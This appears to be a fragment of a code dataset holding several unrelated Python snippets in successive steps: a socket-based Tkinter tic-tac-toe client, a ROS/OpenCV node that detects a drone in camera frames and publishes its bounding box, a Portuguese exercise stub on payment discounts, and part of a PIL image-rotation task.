b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b3['text'] == 'X' and b5['text'] == 'X' and b7['text'] == 'X':\n b3.config(bg='green')\n b5.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!X Wins!!!!!!!!')\n elif b1['text'] == 'O' and b2['text'] == 'O' and b3['text'] == 'O':\n b1.config(bg='green')\n b2.config(bg='green')\n b3.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b4['text'] == 'O' and b5['text'] == 'O' and b6['text'] == 'O':\n b4.config(bg='green')\n b5.config(bg='green')\n b6.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b7['text'] == 'O' and b8['text'] == 'O' and b9['text'] == 'O':\n b7.config(bg='green')\n b8.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b1['text'] == 'O' and b4['text'] == 'O' and b7['text'] == 'O':\n b1.config(bg='green')\n b4.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b2['text'] == 'O' and b5['text'] == 'O' and b8['text'] == 'O':\n b2.config(bg='green')\n b5.config(bg='green')\n b8.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b3['text'] == 'O' and b6['text'] == 'O' and b9['text'] == 'O':\n b3.config(bg='green')\n b6.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b1['text'] == 'O' and b5['text'] == 'O' and b9['text'] == 'O':\n b1.config(bg='green')\n b5.config(bg='green')\n b9.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n elif b3['text'] == 'O' and b5['text'] == 'O' and b7['text'] == 'O':\n b3.config(bg='green')\n b5.config(bg='green')\n b7.config(bg='green')\n winner = True\n for w in New.winfo_children():\n w.configure(state='disabled')\n messagebox.showinfo('Winner', 'Congo!!!!!!!O Wins!!!!!!!!')\n\n\ndef b_click(b):\n to_send = str(b)\n to_send = to_send.replace('.', '')\n to_send = str(to_send.replace('!', ''))\n print(to_send)\n global clicked\n if b['text'] == '' and b['state'] != 'disabled':\n labels.config(text=\"X's Turn\")\n b.configure(state=DISABLED)\n b['text'] = 'O'\n checkwin()\n if connection_established == True:\n sock.send(to_send.encode())\n for w in New.winfo_children():\n w.configure(state='disabled')\n\n\nb1 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b1))\nb1.grid(row=0, column=0)\nb2 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b2))\nb2.grid(row=0, column=1)\nb3 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b3))\nb3.grid(row=0, column=2)\nb4 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b4))\nb4.grid(row=1, column=0)\nb5 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b5))\nb5.grid(row=1, column=1)\nb6 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b6))\nb6.grid(row=1, column=2)\nb7 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b7))\nb7.grid(row=2, column=0)\nb8 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b8))\nb8.grid(row=2, column=1)\nb9 = Button(New, text='', font=('Verdana', 20), height=3, width=6, bg=\n 'SystemButtonFace', command=lambda : b_click(b9))\nb9.grid(row=2, column=2)\nlabels = Label(New, fg='white', bg='black', pady=1, text='Opponent Turn ',\n height=2, justify='center')\nlabels.grid(row=3, column=0)\nfor w in New.winfo_children():\n w.configure(state='disabled')\nNew.mainloop()\n",
"step-5": "from tkinter import *\r\nfrom tkinter import messagebox\r\nfrom tkinter import ttk\r\nfrom PIL import Image, ImageTk\r\nimport time\r\nimport socket\r\nimport threading\r\nroot = Tk()\r\nroot.title(\"Tic-Tac-Toe\")\r\nroot.geometry('600x600')\r\n\r\n\r\nwinner = False\r\n\r\ndef start_thread(target):\r\n thread = threading.Thread(target=target)\r\n thread.daemon = True\r\n thread.start()\r\n \r\nHOST = '127.0.0.1' \r\nPORT = 65432\r\nglobal connection_established\r\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nsock.connect((HOST, PORT))\r\n\r\nconnection_established = True\r\n\r\ndef receive_data():\r\n \r\n while True:\r\n data = sock.recv(1024).decode()\r\n print('decoded is',data)\r\n \r\n if data == 'button': \r\n labels.config(text=\"My Turn or O's Turn\") \r\n b1.config(text='X') \r\n for w in New.winfo_children():\r\n w.configure(state=\"normal\")\r\n b1.config(state=\"disabled\")\r\n \r\n \r\n \r\n elif data == 'button2' : \r\n labels.config(text=\"My Turn or O's Turn\") \r\n b2.config(text='X')\r\n for w in New.winfo_children():\r\n w.configure(state=\"normal\")\r\n b2.config(state=\"disabled\")\r\n \r\n \r\n elif data == 'button3' : \r\n labels.config(text=\"My Turn or O's Turn\") \r\n b3.config(text='X')\r\n for w in New.winfo_children():\r\n w.configure(state=\"normal\")\r\n b3.config(state=\"disabled\")\r\n \r\n \r\n elif data == 'button4' : \r\n labels.config(text=\"My Turn or O's Turn\") \r\n b4.config(text='X')\r\n for w in New.winfo_children():\r\n w.configure(state=\"normal\")\r\n b4.config(state=\"disabled\")\r\n \r\n \r\n elif data == 'button5' : \r\n labels.config(text=\"My Turn or O's Turn\") \r\n b5.config(text='X')\r\n for w in New.winfo_children():\r\n w.configure(state=\"normal\")\r\n b5.config(state=\"disabled\")\r\n \r\n \r\n elif data == 'button6' : \r\n labels.config(text=\"My Turn or O's Turn\") \r\n b6.config(text='X')\r\n for w in New.winfo_children():\r\n w.configure(state=\"normal\")\r\n b6.config(state=\"disabled\")\r\n \r\n \r\n elif data == 'button7' : \r\n labels.config(text=\"My Turn or O's Turn\") \r\n b7.config(text='X')\r\n for w in New.winfo_children():\r\n w.configure(state=\"normal\")\r\n b7.config(state=\"disabled\")\r\n \r\n \r\n elif data == 'button8' : \r\n labels.config(text=\"My Turn or O's Turn\") \r\n b8.config(text='X')\r\n for w in New.winfo_children():\r\n w.configure(state=\"normal\")\r\n b8.config(state=\"disabled\")\r\n \r\n \r\n elif data == 'button9' : \r\n labels.config(text=\"My Turn or O's Turn\") \r\n b9.config(text='X')\r\n for w in New.winfo_children():\r\n w.configure(state=\"normal\")\r\n b9.config(state=\"disabled\")\r\n \r\n \r\n \r\nstart_thread(receive_data)\r\n\r\ndef resize_image(event):\r\n new_width = event.width\r\n new_height = event.height\r\n image = copy_of_image.resize((new_width, new_height))\r\n photo = ImageTk.PhotoImage(image)\r\n label.config(image = photo)\r\n label.image = photo #avoid garbage collection\r\n\r\nimage = Image.open('C:\\\\Users\\\\User\\\\Any_Path\\\\Tic-tac-toe1.png')\r\ncopy_of_image = image.copy()\r\nphoto = ImageTk.PhotoImage(image)\r\nlabel = ttk.Label(root, image = photo)\r\nlabel.bind('<Configure>', resize_image)\r\nlabel.pack(fill=BOTH, expand = YES)\r\n\r\nroot.after(5000, lambda: root.destroy()) # Destroy the widget after 30 seconds\r\nroot.mainloop()\r\n\r\nNew = Tk()\r\nNew.title('Tic-Tac-Toe')\r\nNew.iconbitmap('C:/Users/jainh/Downloads/Tic-tac-toe1.png')\r\n\r\n\r\n\r\nclicked = 'Y'\r\ndef checkwin():\r\n global winner\r\n winner = False\r\n if b1[\"text\"] == \"X\" and b2[\"text\"] == \"X\" and b3[\"text\"] == \"X\":\r\n b1.config(bg='green')\r\n b2.config(bg='green')\r\n b3.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!X Wins!!!!!!!!\")\r\n \r\n elif b4[\"text\"] == \"X\" and b5[\"text\"] == \"X\" and b6[\"text\"] == \"X\":\r\n b4.config(bg='green')\r\n b5.config(bg='green')\r\n b6.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!X Wins!!!!!!!!\") \r\n \r\n elif b7[\"text\"] == \"X\" and b8[\"text\"] == \"X\" and b9[\"text\"] == \"X\":\r\n b7.config(bg='green')\r\n b8.config(bg='green')\r\n b9.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!X Wins!!!!!!!!\")\r\n \r\n elif b1[\"text\"] == \"X\" and b4[\"text\"] == \"X\" and b7[\"text\"] == \"X\":\r\n b1.config(bg='green')\r\n b4.config(bg='green')\r\n b7.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!X Wins!!!!!!!!\")\r\n \r\n elif b2[\"text\"] == \"X\" and b5[\"text\"] == \"X\" and b8[\"text\"] == \"X\":\r\n b2.config(bg='green')\r\n b5.config(bg='green')\r\n b8.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!X Wins!!!!!!!!\") \r\n \r\n elif b3[\"text\"] == \"X\" and b6[\"text\"] == \"X\" and b9[\"text\"] == \"X\":\r\n b3.config(bg='green')\r\n b6.config(bg='green')\r\n b9.config(bg='green')\r\n winner = True\r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!X Wins!!!!!!!!\")\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!X Wins!!!!!!!!\")\r\n \r\n elif b1[\"text\"] == \"X\" and b5[\"text\"] == \"X\" and b9[\"text\"] == \"X\":\r\n b1.config(bg='green')\r\n b5.config(bg='green')\r\n b9.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!X Wins!!!!!!!!\")\r\n \r\n elif b3[\"text\"] == \"X\" and b5[\"text\"] == \"X\" and b7[\"text\"] == \"X\":\r\n b3.config(bg='green')\r\n b5.config(bg='green')\r\n b7.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!X Wins!!!!!!!!\") \r\n \r\n ###################################\r\n \r\n \r\n elif b1[\"text\"] == \"O\" and b2[\"text\"] == \"O\" and b3[\"text\"] == \"O\":\r\n b1.config(bg='green')\r\n b2.config(bg='green')\r\n b3.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!O Wins!!!!!!!!\")\r\n \r\n elif b4[\"text\"] == \"O\" and b5[\"text\"] == \"O\" and b6[\"text\"] == \"O\":\r\n b4.config(bg='green')\r\n b5.config(bg='green')\r\n b6.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!O Wins!!!!!!!!\") \r\n \r\n elif b7[\"text\"] == \"O\" and b8[\"text\"] == \"O\" and b9[\"text\"] == \"O\":\r\n b7.config(bg='green')\r\n b8.config(bg='green')\r\n b9.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!O Wins!!!!!!!!\")\r\n \r\n elif b1[\"text\"] == \"O\" and b4[\"text\"] == \"O\" and b7[\"text\"] == \"O\":\r\n b1.config(bg='green')\r\n b4.config(bg='green')\r\n b7.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!O Wins!!!!!!!!\")\r\n \r\n elif b2[\"text\"] == \"O\" and b5[\"text\"] == \"O\" and b8[\"text\"] == \"O\":\r\n b2.config(bg='green')\r\n b5.config(bg='green')\r\n b8.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!O Wins!!!!!!!!\") \r\n \r\n elif b3[\"text\"] == \"O\" and b6[\"text\"] == \"O\" and b9[\"text\"] == \"O\":\r\n b3.config(bg='green')\r\n b6.config(bg='green')\r\n b9.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!O Wins!!!!!!!!\")\r\n \r\n elif b1[\"text\"] == \"O\" and b5[\"text\"] == \"O\" and b9[\"text\"] == \"O\":\r\n b1.config(bg='green')\r\n b5.config(bg='green')\r\n b9.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo('Winner',\"Congo!!!!!!!O Wins!!!!!!!!\")\r\n \r\n\r\n elif b3[\"text\"] == \"O\" and b5[\"text\"] == \"O\" and b7[\"text\"] == \"O\":\r\n b3.config(bg='green')\r\n b5.config(bg='green')\r\n b7.config(bg='green')\r\n winner = True\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n messagebox.showinfo(\"Winner\",\"Congo!!!!!!!O Wins!!!!!!!!\")\r\n \r\n\r\n \r\n \r\n \r\ndef b_click(b):\r\n \r\n to_send = str(b)\r\n \r\n to_send = to_send.replace('.', '')\r\n to_send = str(to_send.replace('!', ''))\r\n print(to_send)\r\n global clicked\r\n if b[\"text\"] == '' and b['state'] != 'disabled' :\r\n labels.config(text=\"X's Turn\")\r\n b.configure(state=DISABLED)\r\n b['text'] = 'O' \r\n checkwin() \r\n if connection_established == True:\r\n sock.send(to_send.encode())\r\n for w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\nb1 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg=\"SystemButtonFace\",command=lambda:b_click(b1))\r\nb1.grid(row=0,column=0)\r\nb2 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg=\"SystemButtonFace\",command=lambda:b_click(b2))\r\nb2.grid(row=0,column=1)\r\nb3 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg=\"SystemButtonFace\",command=lambda:b_click(b3))\r\nb3.grid(row=0,column=2)\r\n\r\nb4 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg=\"SystemButtonFace\",command=lambda:b_click(b4))\r\nb4.grid(row=1,column=0)\r\nb5 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg=\"SystemButtonFace\",command=lambda:b_click(b5))\r\nb5.grid(row=1,column=1)\r\nb6 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg=\"SystemButtonFace\",command=lambda:b_click(b6))\r\nb6.grid(row=1,column=2)\r\n\r\nb7 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg=\"SystemButtonFace\",command=lambda:b_click(b7))\r\nb7.grid(row=2,column=0)\r\nb8 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg=\"SystemButtonFace\",command=lambda:b_click(b8))\r\nb8.grid(row=2,column=1)\r\nb9 = Button(New, text='',font=('Verdana',20),height=3,width=6,bg=\"SystemButtonFace\",command=lambda:b_click(b9))\r\nb9.grid(row=2,column=2)\r\n\r\nlabels = Label(New, fg=\"white\",bg=\"black\", pady=1,text=\"Opponent Turn \",height=2,justify=\"center\")\r\nlabels.grid(row=3,column=0)\r\nfor w in New.winfo_children():\r\n w.configure(state=\"disabled\")\r\n\r\n#menu = Menu(New)\r\n#New.config(menu=menu)\r\n#options = Menu(menu,tearoff=False)\r\n\r\n\r\nNew.mainloop()\r\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
# ELABORE UM PROGRAMA QUE CALCULE O A SER PAGO POR UM PRODUTO CONSIDERANDO O PRECO NORMAL E A FORMA DE PAGAMENTO
# a vista dinehiro ou cheque: 10%
# a vista no cartao: 5%
# 2x: preco normal
# 3x ou mais: 20% de juros
|
normal
|
{
"blob_id": "fa271d3888dc60582fa0883eaf9f9ebbdffeed9d",
"index": 3064,
"step-1": "# ELABORE UM PROGRAMA QUE CALCULE O A SER PAGO POR UM PRODUTO CONSIDERANDO O PRECO NORMAL E A FORMA DE PAGAMENTO\n# a vista dinehiro ou cheque: 10%\n# a vista no cartao: 5%\n# 2x: preco normal\n# 3x ou mais: 20% de juros",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
1
]
}
|
[
1
] |
#!/usr/bin/env python
import rospy
import cv2
import numpy as np
from cv_bridge import CvBridge
from matplotlib import pyplot as plt
from sensor_msgs.msg import Image
from drone_app_msgs.msg import BBox, Drone, DroneArray
from rospy.numpy_msg import numpy_msg
# ---------------------------------------
# This is an implementation of a simple CV
# algorithm that can be used for testing
# --- Global variables initialization ---
pub = None
# ---------------------------------------
def processFrame(image_message):
# --- Convert from ROS to OpenCV
frame = CvBridge().imgmsg_to_cv2(image_message)
# --- Threshold the image and find a mask
frame_hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(frame_hsv, (0, 0, 0, 0), (180, 255, 30, 0))
mask = cv2.dilate(mask, None, iterations=1)
# --- Find contours in the mask and initialize the current
cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)[-2]
center = None
c = max(cnts, key=cv2.contourArea)
x,y,w,h = cv2.boundingRect(c)
# --- Pack in the message
msg = DroneArray()
drone = Drone()
drone.id = -1
drone.name = 'parrot_bebop2'
drone.box.t.linear.x = x * 100 / 640
drone.box.t.linear.y = y * 100 / 480
drone.box.w = w * 100 / 640
drone.box.h = h * 100 / 480
msg.drones.append(drone)
pub.publish(msg)
if __name__ == '__main__' :
# --- Topics
rospy.init_node('gazeboTracking', anonymous=True)
rospy.Subscriber('camera_img', Image, processFrame)
pub = rospy.Publisher('fixed_drones', DroneArray, queue_size=10)
rospy.spin()
|
normal
|
{
"blob_id": "e864dad3f46fc9c6c472823bd06ce74fb5cb3f41",
"index": 462,
"step-1": "<mask token>\n\n\ndef processFrame(image_message):\n frame = CvBridge().imgmsg_to_cv2(image_message)\n frame_hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n mask = cv2.inRange(frame_hsv, (0, 0, 0, 0), (180, 255, 30, 0))\n mask = cv2.dilate(mask, None, iterations=1)\n cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.\n CHAIN_APPROX_SIMPLE)[-2]\n center = None\n c = max(cnts, key=cv2.contourArea)\n x, y, w, h = cv2.boundingRect(c)\n msg = DroneArray()\n drone = Drone()\n drone.id = -1\n drone.name = 'parrot_bebop2'\n drone.box.t.linear.x = x * 100 / 640\n drone.box.t.linear.y = y * 100 / 480\n drone.box.w = w * 100 / 640\n drone.box.h = h * 100 / 480\n msg.drones.append(drone)\n pub.publish(msg)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef processFrame(image_message):\n frame = CvBridge().imgmsg_to_cv2(image_message)\n frame_hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n mask = cv2.inRange(frame_hsv, (0, 0, 0, 0), (180, 255, 30, 0))\n mask = cv2.dilate(mask, None, iterations=1)\n cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.\n CHAIN_APPROX_SIMPLE)[-2]\n center = None\n c = max(cnts, key=cv2.contourArea)\n x, y, w, h = cv2.boundingRect(c)\n msg = DroneArray()\n drone = Drone()\n drone.id = -1\n drone.name = 'parrot_bebop2'\n drone.box.t.linear.x = x * 100 / 640\n drone.box.t.linear.y = y * 100 / 480\n drone.box.w = w * 100 / 640\n drone.box.h = h * 100 / 480\n msg.drones.append(drone)\n pub.publish(msg)\n\n\nif __name__ == '__main__':\n rospy.init_node('gazeboTracking', anonymous=True)\n rospy.Subscriber('camera_img', Image, processFrame)\n pub = rospy.Publisher('fixed_drones', DroneArray, queue_size=10)\n rospy.spin()\n",
"step-3": "<mask token>\npub = None\n\n\ndef processFrame(image_message):\n frame = CvBridge().imgmsg_to_cv2(image_message)\n frame_hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n mask = cv2.inRange(frame_hsv, (0, 0, 0, 0), (180, 255, 30, 0))\n mask = cv2.dilate(mask, None, iterations=1)\n cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.\n CHAIN_APPROX_SIMPLE)[-2]\n center = None\n c = max(cnts, key=cv2.contourArea)\n x, y, w, h = cv2.boundingRect(c)\n msg = DroneArray()\n drone = Drone()\n drone.id = -1\n drone.name = 'parrot_bebop2'\n drone.box.t.linear.x = x * 100 / 640\n drone.box.t.linear.y = y * 100 / 480\n drone.box.w = w * 100 / 640\n drone.box.h = h * 100 / 480\n msg.drones.append(drone)\n pub.publish(msg)\n\n\nif __name__ == '__main__':\n rospy.init_node('gazeboTracking', anonymous=True)\n rospy.Subscriber('camera_img', Image, processFrame)\n pub = rospy.Publisher('fixed_drones', DroneArray, queue_size=10)\n rospy.spin()\n",
"step-4": "import rospy\nimport cv2\nimport numpy as np\nfrom cv_bridge import CvBridge\nfrom matplotlib import pyplot as plt\nfrom sensor_msgs.msg import Image\nfrom drone_app_msgs.msg import BBox, Drone, DroneArray\nfrom rospy.numpy_msg import numpy_msg\npub = None\n\n\ndef processFrame(image_message):\n frame = CvBridge().imgmsg_to_cv2(image_message)\n frame_hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n mask = cv2.inRange(frame_hsv, (0, 0, 0, 0), (180, 255, 30, 0))\n mask = cv2.dilate(mask, None, iterations=1)\n cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.\n CHAIN_APPROX_SIMPLE)[-2]\n center = None\n c = max(cnts, key=cv2.contourArea)\n x, y, w, h = cv2.boundingRect(c)\n msg = DroneArray()\n drone = Drone()\n drone.id = -1\n drone.name = 'parrot_bebop2'\n drone.box.t.linear.x = x * 100 / 640\n drone.box.t.linear.y = y * 100 / 480\n drone.box.w = w * 100 / 640\n drone.box.h = h * 100 / 480\n msg.drones.append(drone)\n pub.publish(msg)\n\n\nif __name__ == '__main__':\n rospy.init_node('gazeboTracking', anonymous=True)\n rospy.Subscriber('camera_img', Image, processFrame)\n pub = rospy.Publisher('fixed_drones', DroneArray, queue_size=10)\n rospy.spin()\n",
"step-5": "#!/usr/bin/env python\nimport rospy\nimport cv2\nimport numpy as np\nfrom cv_bridge import CvBridge\nfrom matplotlib import pyplot as plt\nfrom sensor_msgs.msg import Image\nfrom drone_app_msgs.msg import BBox, Drone, DroneArray\nfrom rospy.numpy_msg import numpy_msg\n\n# ---------------------------------------\n# This is an implementation of a simple CV\n# algorithm that can be used for testing\n# --- Global variables initialization ---\npub = None\n# ---------------------------------------\n\ndef processFrame(image_message):\n # --- Convert from ROS to OpenCV\n frame = CvBridge().imgmsg_to_cv2(image_message)\n\n # --- Threshold the image and find a mask\n frame_hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n mask = cv2.inRange(frame_hsv, (0, 0, 0, 0), (180, 255, 30, 0))\n mask = cv2.dilate(mask, None, iterations=1)\n\n # --- Find contours in the mask and initialize the current\n cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)[-2]\n center = None\n c = max(cnts, key=cv2.contourArea)\n x,y,w,h = cv2.boundingRect(c)\n\n # --- Pack in the message\n msg = DroneArray()\n drone = Drone()\n\n drone.id = -1\n drone.name = 'parrot_bebop2'\n drone.box.t.linear.x = x * 100 / 640\n drone.box.t.linear.y = y * 100 / 480\n drone.box.w = w * 100 / 640\n drone.box.h = h * 100 / 480\n\n msg.drones.append(drone)\n pub.publish(msg)\n\nif __name__ == '__main__' :\n # --- Topics\n rospy.init_node('gazeboTracking', anonymous=True)\n rospy.Subscriber('camera_img', Image, processFrame)\n pub = rospy.Publisher('fixed_drones', DroneArray, queue_size=10)\n \n rospy.spin()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
class Task(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@staticmethod
def rotate_file(input_file, output_dir, degrees, expand):
output_file_name = os.path.basename(input_file)
output_file = os.path.join(output_dir, output_file_name)
input_image = Image.open(input_file)
output_image = input_image.rotate(degrees, expand=expand)
output_image.save(output_file)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Task(object):
<|reserved_special_token_0|>
def __init__(self, input_dir, output_dir, **kwargs):
degrees = kwargs.get(str('degrees'), 90.0)
expand_arg = kwargs.get(str('expand'), True)
if expand_arg is True:
expand = 1
elif expand_arg is False:
expand = 0
else:
sys.exit('Argument expand invalid')
for item_name in os.listdir(input_dir):
item_path = os.path.join(input_dir, item_name)
if os.path.isfile(item_path):
self.rotate_file(item_path, output_dir, degrees, expand)
elif os.path.isdir(item_path):
output_sub_dir = os.path.join(output_dir, item_name)
os.makedirs(output_sub_dir)
contained_files = get_file_paths_from_directory(item_path)
for contained_file in contained_files:
self.rotate_file(contained_file, output_sub_dir,
degrees, expand)
@staticmethod
def rotate_file(input_file, output_dir, degrees, expand):
output_file_name = os.path.basename(input_file)
output_file = os.path.join(output_dir, output_file_name)
input_image = Image.open(input_file)
output_image = input_image.rotate(degrees, expand=expand)
output_image.save(output_file)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Task(object):
"""
Documentation: https://docs.droppyapp.com/tasks/image-rotate
"""
def __init__(self, input_dir, output_dir, **kwargs):
degrees = kwargs.get(str('degrees'), 90.0)
expand_arg = kwargs.get(str('expand'), True)
if expand_arg is True:
expand = 1
elif expand_arg is False:
expand = 0
else:
sys.exit('Argument expand invalid')
for item_name in os.listdir(input_dir):
item_path = os.path.join(input_dir, item_name)
if os.path.isfile(item_path):
self.rotate_file(item_path, output_dir, degrees, expand)
elif os.path.isdir(item_path):
output_sub_dir = os.path.join(output_dir, item_name)
os.makedirs(output_sub_dir)
contained_files = get_file_paths_from_directory(item_path)
for contained_file in contained_files:
self.rotate_file(contained_file, output_sub_dir,
degrees, expand)
@staticmethod
def rotate_file(input_file, output_dir, degrees, expand):
output_file_name = os.path.basename(input_file)
output_file = os.path.join(output_dir, output_file_name)
input_image = Image.open(input_file)
output_image = input_image.rotate(degrees, expand=expand)
output_image.save(output_file)
<|reserved_special_token_1|>
from __future__ import unicode_literals
import os
try:
import Image
except ImportError:
from PIL import Image
import sys
sys.path.append(os.path.abspath(os.path.join(__file__, os.pardir, os.pardir,
'DropPy.Common')))
from file_tools import get_file_paths_from_directory
class Task(object):
"""
Documentation: https://docs.droppyapp.com/tasks/image-rotate
"""
def __init__(self, input_dir, output_dir, **kwargs):
degrees = kwargs.get(str('degrees'), 90.0)
expand_arg = kwargs.get(str('expand'), True)
if expand_arg is True:
expand = 1
elif expand_arg is False:
expand = 0
else:
sys.exit('Argument expand invalid')
for item_name in os.listdir(input_dir):
item_path = os.path.join(input_dir, item_name)
if os.path.isfile(item_path):
self.rotate_file(item_path, output_dir, degrees, expand)
elif os.path.isdir(item_path):
output_sub_dir = os.path.join(output_dir, item_name)
os.makedirs(output_sub_dir)
contained_files = get_file_paths_from_directory(item_path)
for contained_file in contained_files:
self.rotate_file(contained_file, output_sub_dir,
degrees, expand)
@staticmethod
def rotate_file(input_file, output_dir, degrees, expand):
output_file_name = os.path.basename(input_file)
output_file = os.path.join(output_dir, output_file_name)
input_image = Image.open(input_file)
output_image = input_image.rotate(degrees, expand=expand)
output_image.save(output_file)
<|reserved_special_token_1|>
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
try:
import Image
except ImportError:
from PIL import Image
import sys
sys.path.append(os.path.abspath(os.path.join(__file__, os.pardir, os.pardir, 'DropPy.Common')))
from file_tools import get_file_paths_from_directory
class Task(object):
"""
Documentation: https://docs.droppyapp.com/tasks/image-rotate
"""
def __init__(self, input_dir, output_dir, **kwargs):
# Get keyword arguments.
degrees = kwargs.get(str('degrees'), 90.0)
expand_arg = kwargs.get(str('expand'), True)
# Check arguments.
if expand_arg is True:
expand = 1
elif expand_arg is False:
expand = 0
else:
sys.exit('Argument expand invalid')
# Process files and directories.
